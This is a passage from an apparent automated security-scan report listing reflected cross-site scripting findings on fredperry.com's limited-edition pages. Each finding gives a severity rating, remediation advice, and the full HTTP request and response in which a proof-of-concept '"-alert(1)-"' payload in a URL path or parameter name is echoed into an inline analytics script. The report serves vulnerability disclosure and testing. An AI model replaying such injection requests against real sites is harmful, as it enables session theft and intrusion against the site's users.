Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.3.10.1289349290

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 18:36:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=23llskiairskf7nqs63bm7fup7; expires=Tue, 09-Nov-2010 19:36:11 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 32771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/collaboration-raf-simons/?SID=2hPWQxiLpIPJPjREOVJiLvolj/gt24Tjf99vflOKNYQ=b6089"-alert(1)-"78f69521811");
//]]>
...[SNIP]...

1.106. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 753ab"-alert(1)-"f5f7eed41f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/collaboration-raf-simons/?753ab"-alert(1)-"f5f7eed41f2=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:07:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1r8bdethkco9bag8hd3biug112; expires=Tue, 09-Nov-2010 17:07:43 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/collaboration-raf-simons/?753ab"-alert(1)-"f5f7eed41f2=1");
//]]>
...[SNIP]...

1.107. http://www.fredperry.com/limited-edition/men/footwear/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/footwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 979cb"-alert(1)-"bd24e099cfd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition979cb"-alert(1)-"bd24e099cfd/men/footwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=b5ovimaq1a269sva272fjhn656; expires=Tue, 09-Nov-2010 17:12:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition979cb"-alert(1)-"bd24e099cfd/men/footwear/");
//]]>
...[SNIP]...

1.108. http://www.fredperry.com/limited-edition/men/footwear/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/footwear/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bc3d"-alert(1)-"169d283a576 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men7bc3d"-alert(1)-"169d283a576/footwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=im80s9cq1u9q59qolfhjvgc0a6; expires=Tue, 09-Nov-2010 17:13:03 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men7bc3d"-alert(1)-"169d283a576/footwear/");
//]]>
...[SNIP]...

1.109. http://www.fredperry.com/limited-edition/men/footwear/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/footwear/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc2b9"-alert(1)-"be53c83d711 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/footwearbc2b9"-alert(1)-"be53c83d711/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=494opmqoclu78ed6ptci9eaf06; expires=Tue, 09-Nov-2010 17:13:37 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/footwearbc2b9"-alert(1)-"be53c83d711/");
//]]>
...[SNIP]...

1.110. http://www.fredperry.com/limited-edition/men/footwear/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/footwear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e0e7"-alert(1)-"38b1976be02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/footwear/?9e0e7"-alert(1)-"38b1976be02=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ajbvr9uubhd1p5n43a8ciqg5o6; expires=Tue, 09-Nov-2010 17:11:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/footwear/?9e0e7"-alert(1)-"38b1976be02=1");
//]]>
...[SNIP]...

1.111. http://www.fredperry.com/limited-edition/men/jackets/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/jackets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87423"-alert(1)-"78a5c0855dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition87423"-alert(1)-"78a5c0855dc/men/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4nuf1et02e07oi73qvqof1qh46; expires=Tue, 09-Nov-2010 17:13:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition87423"-alert(1)-"78a5c0855dc/men/jackets/");
//]]>
...[SNIP]...

1.112. http://www.fredperry.com/limited-edition/men/jackets/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/jackets/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee837"-alert(1)-"f8707917c46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/menee837"-alert(1)-"f8707917c46/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=5c1cf8cj9pbs5m5honuqit50q1; expires=Tue, 09-Nov-2010 17:13:56 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/menee837"-alert(1)-"f8707917c46/jackets/");
//]]>
...[SNIP]...

1.113. http://www.fredperry.com/limited-edition/men/jackets/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/jackets/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94014"-alert(1)-"d16e6883150 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/jackets94014"-alert(1)-"d16e6883150/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4edgddt3us8kdggun3pnup1cu7; expires=Tue, 09-Nov-2010 17:14:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/jackets94014"-alert(1)-"d16e6883150/");
//]]>
...[SNIP]...

1.114. http://www.fredperry.com/limited-edition/men/jackets/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/jackets/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91787"-alert(1)-"5d4b3174de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/jackets/?91787"-alert(1)-"5d4b3174de=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ipnrrfroenifcc68853hh96l57; expires=Tue, 09-Nov-2010 17:11:34 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/jackets/?91787"-alert(1)-"5d4b3174de=1");
//]]>
...[SNIP]...

1.115. http://www.fredperry.com/limited-edition/men/knitwear/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/knitwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dddb"-alert(1)-"34b8e81cc19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition4dddb"-alert(1)-"34b8e81cc19/men/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=n9ra8r0sau1t0h6t9nemlua6p4; expires=Tue, 09-Nov-2010 17:13:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition4dddb"-alert(1)-"34b8e81cc19/men/knitwear/");
//]]>
...[SNIP]...

1.116. http://www.fredperry.com/limited-edition/men/knitwear/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/knitwear/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7881"-alert(1)-"0fee6082005 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/menf7881"-alert(1)-"0fee6082005/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=of96rkse531fjcp0dee2fp1jp2; expires=Tue, 09-Nov-2010 17:14:02 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/menf7881"-alert(1)-"0fee6082005/knitwear/");
//]]>
...[SNIP]...

1.117. http://www.fredperry.com/limited-edition/men/knitwear/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/knitwear/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6277"-alert(1)-"d5b0d20f61b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/knitweard6277"-alert(1)-"d5b0d20f61b/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=tf1c4q1115nglm7718ghr1ebl0; expires=Tue, 09-Nov-2010 17:14:26 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/knitweard6277"-alert(1)-"d5b0d20f61b/");
//]]>
...[SNIP]...

1.118. http://www.fredperry.com/limited-edition/men/knitwear/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/knitwear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 182cb"-alert(1)-"18aae9e5047 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/knitwear/?182cb"-alert(1)-"18aae9e5047=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:12:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=d4i4f76btfgd8nphpd8gg1kdc0; expires=Tue, 09-Nov-2010 17:12:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
